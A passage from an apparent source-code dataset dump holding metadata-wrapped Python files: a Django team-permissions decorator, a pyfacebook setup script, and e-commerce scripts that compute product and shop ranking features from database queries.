groups\n import django_teams.models\n django_teams.models.CurrentUser = User.objects.get(pk=1)\n\n team1 = Team(name=\"Team Mtn Dew\")\n team1.save()\n team1.add_user(django_teams.models.CurrentUser, team_role=20)\n\n Ownership.grant_ownership(team1, django_teams.models.CurrentUser)\n\n override_manager(User)\n\n self.assertEqual(User.objects.all().count(), 1)\n self.assertEqual(django_teams.models.CurrentUser.groups.all().count(), 0)\n" }, { "alpha_fraction": 0.6370245814323425, "alphanum_fraction": 0.6370245814323425, "avg_line_length": 38.733333587646484, "blob_id": "0219438de426974c5931f05eb55ffdb2b58b7e7f", "content_id": "1d88880f3306ec2c2bd7fbbf4e241e206cec0c58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1788, "license_type": "no_license", "max_line_length": 101, "num_lines": 45, "path": "/django_teams/decorators.py", "repo_name": "hughed2/django_teams", "src_encoding": "UTF-8", "text": "from functools import 
wraps\nfrom django_teams.models import override_manager, revert_manager\nimport django_teams.models\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.decorators import available_attrs\nfrom django.db import models\nfrom django_teams.utils import get_related_managers\n\nimport sys\nimport inspect\n\ndef teamify(view_func):\n @wraps(view_func, assigned=available_attrs(view_func))\n def wrapper(request, *args, **kwargs):\n # Set the current user\n django_teams.models.CurrentUser = request.user\n # Set the current team, as per settings instructions\n def get_team(user, **kwargs):\n if 'django_team_pk' in kwargs:\n return Team.objects.get(pk=kwargs['django_team_pk'])\n return None\n\n django_teams.models.CurrentTeam = get_team(django_teams.models.CurrentUser, **kwargs)\n\n # Setup the filters\n # Ignore apps/models specified in settings\n ignore_apps = ['django_teams', 'contenttypes']\n ignore_models = []\n for model in models.get_models(include_auto_created=True):\n m = ContentType.objects.get_for_model(model)\n if m.app_label not in ignore_apps and (m.app_label + '_' + m.model) not in ignore_models:\n override_manager(model)\n # Override related managers\n for manager in get_related_managers(model):\n sys.stdout.write(repr(manager)+\"\\n\")\n sys.stdout.flush()\n override_manager(manager)\n\n try:\n ret = view_func(request, *args, **kwargs)\n finally:\n for model in models.get_models(include_auto_created=True):\n revert_manager(model)\n return ret\n return wrapper\n" } ]
5
alanzoppa/pyfacebook
https://github.com/alanzoppa/pyfacebook
44a23a16d830bafacda3d3b32e38568bfa362d44
87a8fcc659a07fec10c16fa80fb460d722212f95
d767de7e981f7ede8b290857205fbc2576e4a663
refs/heads/master
2021-01-16T20:43:55.981968
2010-09-08T17:00:51
2010-09-08T17:00:51
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6495956778526306, "alphanum_fraction": 0.6549865007400513, "avg_line_length": 29.91666603088379, "blob_id": "16efae70d5cbf8ed36d64cd10a4df94079305d56", "content_id": "c4bc44af8ec904b489880a9555f250486721627a", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 371, "license_type": "no_license", "max_line_length": 63, "num_lines": 12, "path": "/setup.py", "repo_name": "alanzoppa/pyfacebook", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom distutils.core import setup\n\nsetup(name='pyfacebook',\n version='0.1',\n description='Python Client Library for the Facebook API',\n author='Samuel Cormier-Iijima',\n author_email='[email protected]',\n url='http://github.com/alanzoppa/pyfacebook',\n packages=['pyfacebook', 'pyfacebook.djangofb',\n 'pyfacebook.djangofb.default_app'])\n" } ]
1
magicbupt/ltr_feartures_compute_job
https://github.com/magicbupt/ltr_feartures_compute_job
ba8e300d5b435958f2e4fd8d8c8e147693e683d3
aa6e5b504248cf1ba95ce7fd770a370fe618ca7d
284205b7cc98f8368fd44957e0cfa9ad988643ad
refs/heads/master
2019-01-22T00:07:44.576068
2013-11-19T03:44:09
2013-11-19T03:45:47
14,513,331
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6293714046478271, "alphanum_fraction": 0.6432049870491028, "avg_line_length": 26.542682647705078, "blob_id": "8a8e66ed0e6cb503817860b5c62c7b9c44791308", "content_id": "d87bdeb465c81164e26e4af709c66f774e88ec17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9036, "license_type": "no_license", "max_line_length": 110, "num_lines": 328, "path": "/bin/get_product_info.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#encoding:utf-8\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport os\nimport re\nimport time, datetime\nimport math\nfrom ConfigParser import RawConfigParser\nfrom ConfigParser import *\n\nsys.path.append('../lib')\nimport logging\nimport logging.config\nfrom mail_sender import MailSender\nfrom data_access_object import DataObject\nfrom db_factory import DBFactory\n\n\nclass ProductInfo(object):\n\tdef __init__(self, conf_path = '..'):\n\t\t'''\n\t\tinit\n\t\t'''\n\t\t#db redis config file position\n\t\tself.conncfg = '%s/conf/connect.cfg' % (conf_path)\n\t\t#log config file\n\t\tself.logcfg = '%s/conf/logger.conf' % (conf_path)\n\t\tlogging.config.fileConfig(self.logcfg)\n\t\tself.logger = logging.getLogger('log')\n\t\t#other config such as email recivers\n\t\tself.filecfg = '%s/conf/main.cfg' % (conf_path)\n\t\tself.fileconfig = RawConfigParser()\n\t\tself.fileconfig.read(self.filecfg)\n\t\t#sql config file\n\t\tself.sqlcfg = '%s/conf/sql.cfg' % (conf_path)\n\t\tself.config = RawConfigParser()\n\t\tself.config.read(self.conncfg)\n\t\tself.sqlfig = RawConfigParser()\n\t\tself.sqlfig.read(self.sqlcfg)\n\t\t#connect db redis\n\t\tself.conn_search_db = self.connDbserver('search_v3_view')\n#\t\tself.conn_redis = self.connRedis()\n\t\tself.sql = self.sqlfig.get('select', 'select_product_info')\n\t\t# config email info\n\t\tself.mail_recivers = self.setMailReceiver('email', 'receiver')\n\t\tself.mail_sender = MailSender()\n\t\t#product info\n\t\tself.pid_info = {}\n\t\tself.pid_day_uv = {}\n\t\tself.pid_week_uv = {}\n\t\tself.pid_month_uv = {}\n\n\n\tdef readUV(self, filepath, dt):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(filepath, 'r')\n\t\t\twhile True:\n\t\t\t\tline = file.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tarray = line.strip().split()\n\t\t\t\tif len(array) != 2:\n\t\t\t\t\tcontinue\n\t\t\t\tpid = str2int(array[0])\n\t\t\t\tuv = str2int(array[1])\n\t\t\t\tdt[pid] = uv\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\n\tdef getUV(self, pid, dt):\n\t\tif pid in dt:\n\t\t\treturn dt[pid]\n\t\treturn 0\n\t\t\n\tdef setMailReceiver(self,section = 'email', part = 'receiver'):\n\t\temail_list = self.fileconfig.get(section,part).split(',')\n\t\tmail_receiver = []\n\t\tlenght = len(email_list)\n\t\tfor i in range(lenght):\n\t\t\temail = email_list[i].strip(' ')\n\t\t\tif email == '':\n\t\t\t\tcontinue\n\t\t\tmail_receiver.append(email)\n\t\treturn mail_receiver\n\n\tdef connDbserver(self, section = 'antifraud_conn'):\n\t\tdbserver = None\n\t\ttry:\n\t\t\tdbtype = self.config.get(section, 'dbtype')\n\t\t\thost = self.config.get(section, 'host')\n\t\t\tport = self.config.get(section, 'port')\n\t\t\tuser = self.config.get(section, 'user')\n\t\t\tpassword = self.config.get(section, 'password')\n\t\t\tdatabase = self.config.get(section, 'database')\n\t\t\tdbserver = DBFactory.Connect(dbtype = dbtype, host = host, database = database, \\\n\t\t\t\t\tcharset = 
'utf8',user = user, password = password, port = port)\n\t\texcept Exception, ex:\n\t\t\tself.logger.error(ex)\n\t\t\tprint 'Can not connect to dbserver'\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\t\traise Exception, ex\n\t\treturn dbserver\n\n\tdef getProductInfo(self, filepath):\n\t\tsql = self.sql\n\t\tfile = None\n\t\ttry:\n\t\t\tself.conn_search_db.execute(sql)\n\t\t\tfile = open(filepath, 'w+')\n\t\t\twhile True:\n\t\t\t\tline = self.conn_search_db.fetchmany(10000)\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tfor i in range(len(line)):\n\t\t\t\t\tarray = line[i]\n\t\t\t\t\tif len(array) != 16:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tpid, is_new, is_mall, is_discount, score, discount, \\\n\t\t\t\t\t\tsale_day, n_sale, sale_month, n_keep, \\\n\t\t\t\t\t\treview_total, price, dd_price, \\\n\t\t\t\t\t\tpromo_price, n_days = self.caculateModel(array)\n\t\t\t\t\td_uv = self.getUV(pid, self.pid_day_uv)\n\t\t\t\t\tw_uv = self.getUV(pid, self.pid_week_uv)\n\t\t\t\t\tm_uv = self.getUV(pid, self.pid_month_uv)\n\t\t\t\t\tproduct_info = \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % (is_mall, is_new, \\\n\t\t\t\t\t\tis_discount, score, discount, sale_day, n_sale, sale_month, n_keep, review_total, price, dd_price,\\\n\t\t\t\t\t\tpromo_price, d_uv, w_uv, m_uv, n_days)\n\t\t\t\t\tfile.write(\"%s\\t%s\\n\" % (pid, product_info))\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\t\tself.logger.error(ex)\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\t\t\tif self.conn_search_db:\n\t\t\t\tself.conn_search_db.close()\n\t\n\t\n\tdef readProductInfo(self, srcpath, n_features):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(srcpath, 'r')\n\t\t\twhile True:\n\t\t\t\tline = file.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tarray = line.strip(\"\\n\").split(\"\\t\")\n\t\t\t\tlenght = len(array)\n\t\t\t\tif lenght != n_features:\n\t\t\t\t\tcontinue\n\t\t\t\tpid = str2int(array[0])\n\t\t\t\tproduct_info = \"\"\n\t\t\t\tfor i in range(1, lenght):\n\t\t\t\t\tproduct_info = \"%s\\t%s\" % (product_info, array[i])\n\t\t\t\tproduct_info = product_info.strip(\"\\t\")\n\t\t\t\tself.pid_info[pid] = product_info\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\t\t\n\t\n\tdef IsNewProduct(self, pid, first_input_date, cat_paths):\n\t\tif first_input_date==None or str(first_input_date)=='':\n\t\t\treturn 0, 0\n\t\tif cat_paths == None:\n\t\t\tcat_paths = \"01\"\n\t\t\n\t\tmall_new_days = 14\n\t\tpub_new_days = 30\n\t\tmall_time = ( datetime.datetime.now() + \\\n\t\t\t\tdatetime.timedelta(days=-mall_new_days) ).strftime('%Y-%m-%d')\n\t\tpub_time = ( datetime.datetime.now() + \\\n\t\t\t\tdatetime.timedelta(days=-pub_new_days) ).strftime('%Y-%m-%d')\n\n\t\tmall_new = int(time.mktime(time.strptime(mall_time, '%Y-%m-%d')))\n\t\tpub_new = int(time.mktime(time.strptime(pub_time, '%Y-%m-%d')))\n\t\tfirst_date = int(time.mktime(\\\n\t\t\t\ttime.strptime(first_input_date.strftime('%Y-%m-%d'), '%Y-%m-%d')))\n\n\t\tcat = cat_paths.strip().split('|')[0].split('.')[0]\n\t\t\n\t\tis_mall_product = 0\n\t\tif cat == \"58\":\n\t\t\tis_mall_product = 1\n\t\t\n\t\tif cat==\"58\" and (first_date-mall_new)>0:\n\t\t\treturn 1, is_mall_product\n\t\telif cat==\"01\" and (first_date-pub_new)>0:\n\t\t\treturn 1, is_mall_product\n\t\telse:\n\t\t\treturn 0, is_mall_product\n\t\treturn 0, is_mall_product\n\n\tdef IsDiscountProduct(self, begin_date, end_date):\n\t\tif begin_date != 
None:\n\t\t\tnow_date = datetime.datetime.now()\n\t\t\tif now_date >= begin_date:\n\t\t\t\tif end_date != None:\n\t\t\t\t\tif now_date <= end_date:\n\t\t\t\t\t\treturn 1\n\t\t\t\telse:\n\t\t\t\t\treturn 1\n\t\treturn 0\n\n \tdef calDiscount(self, price, dd_price, promo_price, isDiscount):\n\t\tdiscount = 0\n\t\tprice = str2float(price)\n\t\tdd_price = str2float(dd_price)\n\t\tpromo_price = str2float(promo_price)\n\n\t\tif price == 0:\n\t\t\tdiscount = 10\n\t\telse:\n\t\t\tif isDiscount == 1 and promo_price != 0:\n\t\t\t\tdiscount = promo_price/(1.0*price)*10\n\t\t\telif dd_price != 0:\n\t\t\t\tdiscount = dd_price/(1.0*price)*10\n\t\t\telse:\n\t\t\t\tdiscount = 0\n\n\t\treturn round(discount, 2), price, dd_price, promo_price\n\n\tdef productScore(self, score, total_review_count):\n\t\tif score == None:\n\t\t\tscore = 0\n\t\tif total_review_count == None:\n\t\t\ttotal_review_count = 0\n\t\tm = 100\n\t\taverage_score = 5.0\n\t\tval = (total_review_count*score + m*average_score)/(1.0*(total_review_count + m))\n\t\treturn val\n\n\tdef calSaledDays(self, input_day):\n\t\tif input_day == None:\n\t\t\treturn 1000\n\t\tnowday = datetime.datetime.now()\n\t\tdelta = nowday - input_day\n\t\treturn delta.days\t\n\n\tdef caculateModel(self, array):\n\t\tpid = str2int(array[0]) # get pid\t\t\n\t\tis_new, is_mall = self.IsNewProduct(pid, array[7], array[8]) #is new\n\t\tis_discount = self.IsDiscountProduct(array[5], array[6]) #is discount\n\t\tdiscount, price, dd_price, promo_price = self.calDiscount(array[10], \\\n\t\t\t\t\tarray[11], array[12], is_discount) # discount\n\t\tn_keep = str2int(array[4]) #keep num\n\t\tn_sale = str2int(array[1]) #sale num\n\t\tscore = str2float(array[3]) # product score\n\t\treview_total = str2int(array[2]);\n\t\tsale_day = str2int(array[13]);\n\t\tsale_month = str2int(array[14]);\n\t\tn_days = self.calSaledDays(array[15])\n\t\t\n\t\treturn pid, is_new, is_mall, is_discount, score, discount, sale_day,\\\n\t\t\t\t n_sale, sale_month, n_keep, review_total, price, dd_price, promo_price, n_days;\n\n\tdef run(self, search_log_file = \"../data/product_info_\", n_features = 18):\n\t\ttry:\n\t\t\tcurday = datetime.datetime.now().strftime('%Y-%m-%d')\n\t\t\tcurday = getSpecifiedDay(curday, 1)\n\t\t\t\n\t\t\tsearch_log_file = \"%s%s\" % (search_log_file, curday.replace(\"-\", \"\"))\n\t\t\tif not os.path.exists(search_log_file):\n\t\t\t\tself.readUV(\"../data/temp_data/uv_d_%s\" % curday, self.pid_day_uv)\n\t\t\t\tself.readUV(\"../data/temp_data/uv_w_%s\" % curday, self.pid_week_uv)\n\t\t\t\tself.readUV(\"../data/temp_data/uv_m_%s\" % curday, self.pid_month_uv)\n\t\t\t\tself.getProductInfo(search_log_file)\n\t\t\tself.readProductInfo(search_log_file,n_features)\n\t\texcept Exception,ex:\n\t\t\tself.logger.error(ex)\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\t\n\n\ndef getSpecifiedDay(curday, n):\n\t'''\n\tget the n days ago\n\t'''\n\ttry:\n\t\tarray = curday.split('-')\n\t\tif len(array) != 3:\n\t\t\treturn\n\t\tyear = int(array[0])\n\t\tmonth = int(array[1])\n\t\tday = int(array[2])\n\t\tpreday = datetime.datetime(year, month, day) - datetime.timedelta(n)\n\t\treturn preday.strftime(\"%Y-%m-%d\")\n\texcept Exception ,ex:\n\t\tprint 'get preday error~~'\n\t\traise ex\n\treturn\n\ndef str2float(f_str):\n\tval = 0\n\ttry:\n\t\tval = float(f_str)\n\t\tif val < 0:\n\t\t\tval = 0\n\texcept:\n\t\tval = 0\n\treturn val\n\t\t\t\ndef str2int(i_str):\n\tval = 0\n\ttry:\n\t\tval = int(i_str)\n\t\tif val < 0:\n\t\t\tval = 0\n\texcept:\n\t\tval = 0\n\treturn val\n\n\ndef main():\n\to = 
ProductInfo()\n\to.run()\n\nif __name__==\"__main__\":\n\tmain()\n\n\n" }, { "alpha_fraction": 0.6042327880859375, "alphanum_fraction": 0.6179894208908081, "avg_line_length": 21.404762268066406, "blob_id": "a578a926dd31ab9174e445c5232763be874b2bd1", "content_id": "9ff9464bfd83f4965efa6d1d7a72dbeb1d0680c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 945, "license_type": "no_license", "max_line_length": 76, "num_lines": 42, "path": "/bin/set_thrift_server_data.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "\nimport sys\n\nclass SetThriftData():\n\tdef __init__(self):\n\t\tself.job_name = \"thrift data\"\n\n\tdef saveData(self, srcfilepath, dispath):\n\t\tsrcfile = None\n\t\tdisfile_array = None\n\t\ttry:\n\t\t\tsrcfile = open(srcfilepath, 'r')\n\t\t\tdisfile_array = [open('%s%s' % (dispath, i), 'w+') for i in range(10000)]\n\t\t\twhile True:\n\t\t\t\tline = srcfile.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tarray = line.strip(\"\\n\").split(\"\\t\")\n\t\t\t\tpid = int(array[0])\n\t\t\t\tindex = pid%10000\n\t\t\t\tdisfile_array[index].write(line)\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif srcfile:\n\t\t\t\tsrcfile.close()\n\t\t\tif disfile_array:\n\t\t\t\tfor i in range(len(disfile_array)):\n\t\t\t\t\tif disfile_array[i]:\n\t\t\t\t\t\tdisfile_array[i].close()\n\n\ndef main():\n\tif len(sys.argv) != 2:\n\t\treturn\n\tcurday = sys.argv[1]\t\n\tsrcfilepath = \"../data/product_info_%s\" % curday\n\tdispath = \"../data/thrift_data/temp_data_\"\n\to = SetThriftData()\n\to.saveData(srcfilepath, dispath)\n\nif __name__==\"__main__\":\n\tmain()\t\t\t\n" }, { "alpha_fraction": 0.5095056891441345, "alphanum_fraction": 0.5209125280380249, "avg_line_length": 11.476190567016602, "blob_id": "108dd21aa3872265593b124e59e9303e9e22bf06", "content_id": "2a1f01c9510b0b27023e622427ebac7193976397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 263, "license_type": "no_license", "max_line_length": 33, "num_lines": 21, "path": "/bin/Makefile", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "CC = g++ \nINCLUDE =\nBIN = \nLIB =\n \nCFLAGS = -D_GNU_SOURCE -Wall -g \n\nLDFLAGS = \nTARGET = map2hashmap\n\t\t\nall: $(TARGET)\n\t\t\n$(TARGET):map2staticmap.o\n\t$(CC) -o $@ $^ $(LIB)\n\t\t\n%.o : %.cpp\n\t$(CC) -c $(CFLAGS) $< $(INCLUDE)\n\t\t\nclean :\n\t$(RM) *.o\n\t$(RM) map2hashmap \n" }, { "alpha_fraction": 0.661282479763031, "alphanum_fraction": 0.6693587303161621, "avg_line_length": 25.852174758911133, "blob_id": "dfb235ccb09348467038c4afcbe4cedcc411a548", "content_id": "33e5abc22b2581a420f44e0befb4ff19f9ca5c08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6191, "license_type": "no_license", "max_line_length": 84, "num_lines": 230, "path": "/bin/get_shop_info.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#encoding:utf-8\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport os\nimport re\nimport time, datetime\nimport math\nfrom ConfigParser import RawConfigParser\nfrom ConfigParser import *\n\nsys.path.append('../lib')\nimport logging\nimport logging.config\nfrom mail_sender import MailSender\nfrom data_access_object import DataObject\nfrom db_factory import DBFactory\n\nclass ShopInfo(object):\n\tdef __init__(self, conf_path = 
'..'):\n\t\t'''\n\t\tinit\n\t\t'''\n\t\t#db redis config file position\n\t\tself.conncfg = '%s/conf/connect.cfg' % (conf_path)\n\t\t#log config file\n\t\tself.logcfg = '%s/conf/logger.conf' % (conf_path)\n\t\tlogging.config.fileConfig(self.logcfg)\n\t\tself.logger = logging.getLogger('log')\n\t\t#other config such as email recivers\n\t\tself.filecfg = '%s/conf/main.cfg' % (conf_path)\n\t\tself.fileconfig = RawConfigParser()\n\t\tself.fileconfig.read(self.filecfg)\n\t\t#sql config file\n\t\tself.sqlcfg = '%s/conf/sql.cfg' % (conf_path)\n\t\tself.config = RawConfigParser()\n\t\tself.config.read(self.conncfg)\n\t\tself.sqlfig = RawConfigParser()\n\t\tself.sqlfig.read(self.sqlcfg)\n\t\t#connect db redis\n\t\tself.conn_shop_db = self.connDbserver('com_shop_review')\n\t\tself.sql = self.sqlfig.get('select', 'select_shop_info')\t\n\t\t# config email info\n\t\tself.mail_recivers = self.setMailReceiver('email', 'receiver')\n\t\tself.mail_sender = MailSender()\n\n\t\t#dict\n\t\tself.shopid_info_score = {}\n\t\tself.shopid_price_score = {}\n\t\tself.shopid_payment_score = {}\n\t\tself.shopid_deliver_score = {}\n\t\tself.shopid_package_score = {}\n\t\tself.shopid_average_score = {}\n\t\t\n\t\t#shop average score\n\t\tself.shopid_scores = {}\n\t\t\n\n\tdef setMailReceiver(self,section = 'email', part = 'receiver'):\n\t\temail_list = self.fileconfig.get(section,part).split(',')\n\t\tmail_receiver = []\n\t\tlenght = len(email_list)\n\t\tfor i in range(lenght):\n\t\t\temail = email_list[i].strip(' ')\n\t\t\tif email == '':\n\t\t\t\tcontinue\n\t\t\tmail_receiver.append(email)\n\t\treturn mail_receiver\n\n\tdef connDbserver(self, section):\n\t\tdbserver = None\n\t\ttry:\n\t\t\tdbtype = self.config.get(section, 'dbtype')\n\t\t\thost = self.config.get(section, 'host')\n\t\t\tport = self.config.get(section, 'port')\n\t\t\tuser = self.config.get(section, 'user')\n\t\t\tpassword = self.config.get(section, 'password')\n\t\t\tdatabase = self.config.get(section, 'database')\n\t\t\tdbserver = DBFactory.Connect(dbtype = dbtype, host = host, database = database, \\\n\t\t\t\t\tcharset = 'utf8',user = user, password = password, port = port)\n\t\texcept Exception, ex:\n\t\t\tself.logger.error(ex)\n\t\t\tprint 'Can not connect to dbserver'\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\t\traise Exception, ex\n\t\treturn dbserver\n\n\tdef getShopInfo(self, curday):\n\t\tsql = self.sql % curday\n\t\ttry:\n\t\t\tself.conn_shop_db.execute(sql)\n\t\t\twhile True:\n\t\t\t\tline = self.conn_shop_db.fetchmany(10000)\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tfor i in range(len(line)):\n\t\t\t\t\tarray = line[i]\n\t\t\t\t\tshopid = array[0]\n\t\t\t\t\tself.addInfoScore(shopid, array[1])\n\t\t\t\t\tself.addPriceScore(shopid, array[2])\n\t\t\t\t\tself.addPaymentScore(shopid, array[3])\n\t\t\t\t\tself.addDeliverScore(shopid, array[4])\n\t\t\t\t\tself.addPackageScore(shopid, array[5])\n\t\t\t\t\tself.addAverageScore(shopid, array[6])\t\t\t\t\t\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\t\tself.logger.error(ex)\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\tfinally:\n\t\t\tif self.conn_shop_db:\n\t\t\t\tself.conn_shop_db.close()\n\t\n\tdef addInfoScore(self, shopid, score):\n\t\tself.addScore(self.shopid_info_score, shopid, score)\n\n\tdef addPriceScore(self, shopid, score):\n\t\tself.addScore(self.shopid_price_score, shopid, score)\n\n\tdef addPaymentScore(self, shopid, score):\n\t\tself.addScore(self.shopid_payment_score, shopid, score)\n\n\tdef addDeliverScore(self, shopid, 
score):\n\t\tself.addScore(self.shopid_deliver_score, shopid, score)\n\n\tdef addPackageScore(self, shopid, score):\n\t\tself.addScore(self.shopid_package_score, shopid, score)\n\n\tdef addAverageScore(self, shopid, score):\n\t\tself.addScore(self.shopid_average_score, shopid, score)\n\n\tdef addScore(self, dt, shopid, score):\n\t\tif dt == None:\n\t\t\tdt = {}\n\t\t\n\t\tif shopid not in dt:\n\t\t\tdt[shopid] = [0 for i in range(6)]\n\t\t\n\t\tif score == None or score < 0:\n\t\t\tscore = 0\n\t\tif score > 5:\n\t\t\tscore = 5\n\t\t\n\t\tscore = int(score)\t\t\n\t\tdt[shopid][score] += 1\n\t\t\t\t\n\n\tdef updataShopAllScore(self):\n\t\t'''\n\t\tcaculate all item socre's expectation for each shopid\n\t\t'''\n\t\tself.updateShopEachScores(self.shopid_info_score, \"info\")\n\t\tself.updateShopEachScores(self.shopid_price_score, \"price\")\n\t\tself.updateShopEachScores(self.shopid_payment_score, \"payment\")\n\t\tself.updateShopEachScores(self.shopid_deliver_score, \"deliver\")\n\t\tself.updateShopEachScores(self.shopid_package_score, \"package\")\n\t\tself.updateShopEachScores(self.shopid_average_score, \"average\")\t\t\n\n\tdef updateShopEachScores(self, dt, index):\n\t\t'''\n\t\tcaculate each score_item's expectation for each shopid \n\t\t'''\n\t\tE_score = 0\n\t\tn_sum = 0\n\t\tfor shopid, s_info in dt.items():\n\t\t\tE_score = 0\n\t\t\tn_sum = 0\n\t\t\tfor i in range(len(s_info)):\n\t\t\t\tn_sum += s_info[i]\n\t\t\t\tE_score += i*s_info[i]\n\t\t\t\n\t\t\tif n_sum == 0:\n\t\t\t\tE_score = 0\n\t\t\telse:\n\t\t\t\tE_score = E_score/(1.0*n_sum) \n\t\t\t\n\t\t\tR = 3.0\n\t\t\tc = 30\n\t\t\tE_score = (n_sum*E_score + c*R)/(n_sum + c)\n\t\t\tE_score\t= round(E_score, 2)\t\n\t\n\t\t\tif shopid not in self.shopid_scores:\n\t\t\t\tself.shopid_scores[shopid] = {}\n\n\t\t\tself.shopid_scores[shopid][index] = E_score\n\n\tdef saveShopScore(self, filepath):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(filepath, \"w+\")\n\t\t\tfor shopid, scores in self.shopid_scores.items():\n\t\t\t\tprint shopid, scores\n\t\t\t\tfile.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" % (shopid, scores['info'], \\\n\t\t\t\t\tscores['price'],scores['payment'], scores['deliver'],\\\n\t\t\t\t\tscores['package'], scores['average']))\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\n\tdef run(self, filepath):\t\n\t\t'''\n\t\t\n\t\t'''\n\t\tcurday = datetime.datetime.now() + datetime.timedelta(days=-30)\n\t\tcurday = curday.strftime('%Y-%m-%d')\t\t\n\t\tprint \"i am here 111\"\t\n\t\tself.getShopInfo(curday)\n\t\tprint \"i am here 2222\"\t\n\t\tself.updataShopAllScore()\n\t\tprint \"i am here 333\"\t\n\t\tself.saveShopScore(filepath)\n\t\tprint \"i am here 444\"\t\n\t\t\n\ndef main():\n\tprint \"go ...\"\n\to = ShopInfo()\n\n\tprint \"run ...\"\n\tfilepath = \"../data/shop_score.txt\"\n\to.run(filepath)\n\n\tprint \"end !\"\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6483979821205139, "alphanum_fraction": 0.6580101251602173, "avg_line_length": 25.123348236083984, "blob_id": "dbbea418917b829de3ef183d8685bbefd3eab873", "content_id": "99d3aad4d02891071b325943e04233e6f5287225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5930, "license_type": "no_license", "max_line_length": 80, "num_lines": 227, "path": "/bin/caculate_features_for_model.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport 
sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport math\nfrom ConfigParser import RawConfigParser\nfrom ConfigParser import *\n\nsys.path.append('../lib')\nsys.path.append('lib')\nimport logging \nimport logging.config\nfrom mail_sender import MailSender\n\nclass CaculateFeatures4Model():\n\tdef __init__(self, conf_path = '..', feature_num = 18):\n\t\tself.feature_num = feature_num\n\t\t#other config such as email recivers\n\t\tself.filecfg = '%s/conf/main.cfg' % (conf_path)\n\t\tself.fileconfig = RawConfigParser()\n\t\tself.fileconfig.read(self.filecfg)\n\t\t# config email info\n\t\tself.mail_recivers = self.setMailReceiver('email', 'receiver')\n\t\tself.mail_sender = MailSender()\n\n\t\tself.feature_index = {}\n\t\tself.classify_index = {}\n\t\tself.weight_index = {}\n\t\tself.weight_value = {}\n\t\tself.product_info = {}\n\t\tself.product_norm_info = {}\n\t\tself.setFeatureAndClassifyIndex()\n\n\tdef setMailReceiver(self,section = 'email', part = 'receiver'):\n\t\temail_list = self.fileconfig.get(section,part).split(',')\n\t\tmail_receiver = []\n\t\tlenght = len(email_list)\n\t\tfor i in range(lenght):\n\t\t\temail = email_list[i].strip(' ')\n\t\t\tif email == '':\n\t\t\t\tcontinue\n\t\t\tmail_receiver.append(email)\n\t\treturn mail_receiver\n\n\tdef setFeatureAndClassifyIndex(self, section=\"index\"):\n\t\tfeature_list = self.fileconfig.get(section,\"feature_index\").strip().split(',')\n\t\tlenght = len(feature_list)\n\t\tfor i in range(lenght):\n\t\t\tarray = feature_list[i].strip().split(':')\n\t\t\tfeature_index = int(array[0])\n\t\t\tfeature_name = array[1].strip()\n\t\t\tself.feature_index[feature_index] = feature_name\n\n\t\tclassify_list = self.fileconfig.get(section,\"classify_index\").split(',')\n\t\tlenght = len(classify_list)\n\t\tfor i in range(lenght):\n\t\t\tarray = classify_list[i].strip().split(':')\n\t\t\tclassify_index = int(array[0])\n\t\t\tclassify_name = array[1].strip()\n\t\t\tself.classify_index[classify_name] = classify_index\n\n\t\tweight_list = 